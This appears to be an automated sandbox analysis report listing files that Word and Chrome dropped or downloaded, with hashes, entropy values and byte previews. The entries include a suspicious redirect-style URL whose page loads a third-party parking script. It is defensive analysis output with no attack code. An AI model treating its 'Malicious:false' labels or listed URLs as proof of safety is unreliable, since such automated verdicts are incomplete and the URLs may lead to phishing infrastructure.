                                                                                                                                                                                                                                                                                                                                                                          SHA-512:9B68F1C04BDE0024CECFC05A37932368CE2F09BD96C72AB0442E16C8CF5456ED9BB995901095AC1BBDF645255014A5E43AADEE475564F01CA6BE3889C96C29C9
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..t.o.r.r.e.s.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):12
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.41381685030363374
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:/l:
                                                                                                                                                                                                                                                                                                                                                                          MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:............
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):12
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.41381685030363374
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:/l:
                                                                                                                                                                                                                                                                                                                                                                          MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:............
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):12
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.41381685030363374
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:/l:
                                                                                                                                                                                                                                                                                                                                                                          MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:............
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):12
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.41381685030363374
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:/l:
                                                                                                                                                                                                                                                                                                                                                                          MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:............
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 13 15:28:57 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2677
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.993127389404594
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:8mYdOTX7stHtidAKZdA1JehwiZUklqehRdy+3:8mVsdwdy
                                                                                                                                                                                                                                                                                                                                                                          MD5:165616D92DE67989DC3D06CC37CBFBE4
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E5A506609E093F54AFA7786A1F36100375749821
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:1376647F2B2C173B0692909D99FE1495F8B83A9C6286997E86B0A3EECD00778A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8FFFC19AC29F216EA6320A2C31CB2643AA0850BCB6F10B5BA8A0459C626D411D76619B36E3CF1DB813A7CFDAE0D93520EECDB62E18A2A4A9553D075D2C34655D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,......#.5......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ImY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VmY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VmY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VmY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VmY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........{..^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 13 15:28:57 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2679
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.00469048654601
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:8HGYdOTX7stHtidAKZdA10eh/iZUkAQkqehgdy+2:8HGVsH9Q/dy
                                                                                                                                                                                                                                                                                                                                                                          MD5:EB96C5A8C9E88E6A17B4D3E80DC27B96
                                                                                                                                                                                                                                                                                                                                                                          SHA1:2F271F75FB45B00169444AD2E57D3C75E0F6B174
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0A49A2EC4F0E539BF84290F7683773FD3D5A79826DC8573584E0DA5C279F9029
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:75D3041176A9EDA33CCC12E0F7B8C70113F135FEAB92C7513247BEC517452CA6DD9CFDA7585F1C6166BF8BE3BFA4DDD570D82150F6A04B075E6138AAA4794770
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,.....W.#.5......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ImY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VmY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VmY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VmY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VmY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........{..^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2693
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.017013869918336
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:8eYdOTX7sjHtidAKZdA14tIeh7sFiZUkmgqeh7sGdy+BX:8eVs9ncdy
                                                                                                                                                                                                                                                                                                                                                                          MD5:CE50F7F874B1AA76CDFB81062DBFC066
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F0E1C14A1292AE545C67B138562D79E0E5DD3273
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:FE9535491DDC480FDB834350B659700168A4B9D08CD47386CE8B3B0F4DBA31C0
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D0255B772297E6525E73AD7EB1A87928AE0F145F172F1E1B316A4DFCD2B38B20571F9882F3A0FAD3C7C74D3988C37DED207CE0495889B2FCB0EDD6185D04E581
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ImY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VmY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VmY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VmY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........{..^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 13 15:28:57 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2681
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.006303747812433
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:8OYdOTX7stHtidAKZdA1behDiZUkwqehEdy+R:8OVsUudy
                                                                                                                                                                                                                                                                                                                                                                          MD5:D2DCC8880B7171709DBD664A7255652E
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7FBD7702D01BBB6B0B68E7CFACBFA36FA1722A46
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0D2FB01661F55E62E32BF2895AC388C80A27D29A4A4AF6ED6D15EF40F32D1FE7
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8C6DDC0186A4D24D6E12BA4993E015227A4F2E54CB1528CBC43F7CA41BAC9FF7D905CD5CFD235CF79840C1CBCAFDEACDDC196E2546483994E9B5FC3EE2DA6EBD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,.....z.#.5......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ImY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VmY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VmY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VmY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VmY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........{..^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 13 15:28:57 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2681
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.995577704182545
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:8ZYdOTX7stHtidAKZdA1VehBiZUk1W1qehCdy+C:8ZVsU9idy
                                                                                                                                                                                                                                                                                                                                                                          MD5:300F3CD13EF7F3A6F34AAB19F672B577
                                                                                                                                                                                                                                                                                                                                                                          SHA1:40CD8C2ADEFDDD447BF065877FC85E30ED44DC40
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F33A83031B3EB62FD6E9C8E7C87697E8823978FB433DD09BC374501C93BF985D
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A0A0AB8109DD7A01DB6769ADB0E3C96E9A13CD96CB832299A79E290765ED39A6FB1D7504D7E9D1B724B091848411E7CFAD1878C83EECA605C53081956E0E3158
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,.......#.5......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ImY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VmY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VmY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VmY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VmY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........{..^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 13 15:28:57 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2683
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.003511477239726
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:8VYdOTX7stHtidAKZdA1duT6ehOuTbbiZUk5OjqehOuTbcdy+yT+:8VVs+TTTbxWOvTbcdy7T
                                                                                                                                                                                                                                                                                                                                                                          MD5:BFC07FAEC63286AC1B4B2E8BAD89C13A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:3BFA0234C478D943D92D64A10735C492F70FA20B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:4CC6FD51D6C861B78E9CF6ABF54F9932C197C9646EEB29AD4AC77654C096FDD9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F3B104A04144AEE9BA8F7597BD830D0D24D571BCB50495AD0E32B3FA32AA61184FE937DDA7B1EEC199BCB7F20726359A46E1F30DEECE16284C57DDDD5394DC44
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,....g.z#.5......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ImY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VmY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VmY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VmY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VmY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........{..^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):162
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.808501791867199
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:sBYMStL2vdZMToo75T4fay3A4aaaOq2Qn:sBYMO2vGolCqA4Ra32Qn
                                                                                                                                                                                                                                                                                                                                                                          MD5:CFB92C209927F44EAFFB3F4CF64D95ED
                                                                                                                                                                                                                                                                                                                                                                          SHA1:54CA00BC3977EBE5AF8D64CB5727BAD856154DA1
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:DA85DE39C583D24C64E1E0C5A6F8642223B0160249CFACD821C3D9572C3F952B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8A5382CA8F4127CAE135BCA85CCFCE8AEC1E31F09FFE2F718DD625E0573A797E5270F325DF41DF904D82EBE05366367082E4E69BF3E6BCDD4ACADFC9C841E44B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..........................................................F..M%0..Vk.b*w..7.;.%-.....<.(...............&..:.i..m.M2..zWM....E..5........s.T.^.}.j....`Y^..=Vj
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):70028
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.324850069107504
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:RJeUwT7hpwPCHM9ZVK01QYTZ02LKVsdmpyKcicPi:RIT7Vs9ZVKBYj8wKcHPi
                                                                                                                                                                                                                                                                                                                                                                          MD5:045A5D3B2AA4EF90DF00FE65B5230FBC
                                                                                                                                                                                                                                                                                                                                                                          SHA1:81B5D9489ECD166CD745F0A529153620F6124D9A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:FC2BE185A74436042B115336428EEA0EE9574FACA95DC0097B714CAA08179BE1
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:BCAEE3E76E19F1395F6459659982D09B2A6A7DE7D94AD4C45C2184772353FDFDDE86B5E0CC4DF76F8756D21795D161899D460C4EC86A0AAE37B5AF650C2297E1
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.779486743739521
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:YTyLV/Vf1+xNVcSLQzRE9LduVB4:YWLV91iDLQmpdIB4
                                                                                                                                                                                                                                                                                                                                                                          MD5:EA03273602AC31C0858FA2D9A1895526
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4F8AFE25482A22C6858AF1F58E55D83F9DF9B854
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:98D77039EA9249B3DCE91AD7B467EE382F29DAA61213C3E2737BD4A8786C8801
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:77FF06E103CA553FAD14E5F865764CDA76777F83800C439ED91B22B26935146863F9D0C3BBBD3EE95E02C69A1A1C29D0C12A5D9B9D1D619CEEBCF1DCCB422238
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:{"version_hash":"49267bce","url":"https://www.redditstatic.com/ads/49267bce/pixel.js"}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):583
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.129258967489751
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:vQ0AMyHWBFc+sc3Ea2KVdNxtNufiCRiTkJsU3Bg+W6OQ4NbxBShQL:vQFrWMAEafVfN+iCR2kJhg+P4NjSK
                                                                                                                                                                                                                                                                                                                                                                          MD5:51618AC2B7CF5C4937213E965C00F20A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7E704E57162ED18743BEF9F95E2DEA558954751B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0B41F69E6564B9C89B1B344744C5B06EB4ADC0E584028909286D2B936E1AFED5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D07AF4309BF8156644D604676EEC62CF78128DAE1CD1808E865E02BF7302B3DEA5B1EDA42EECD6E8687C84B85A6A52C07BD45B120B8FE5940D8D80586A2D0FB0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://mazans.com/https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-site.lc-91a9f83e57a9c0ac9996388c5a881204-lc.min.css
                                                                                                                                                                                                                                                                                                                                                                          Preview:<html>.<head>. <style>. .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; }. @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }. </style>. <script language="Javascript">var _skz_pid = "9POBEX80W";</script>. <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script>.</head>.<body>.<div class="loader" id="sk-loader"></div>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                                          MD5:99914B932BD37A50B983C5E7C90AE93B
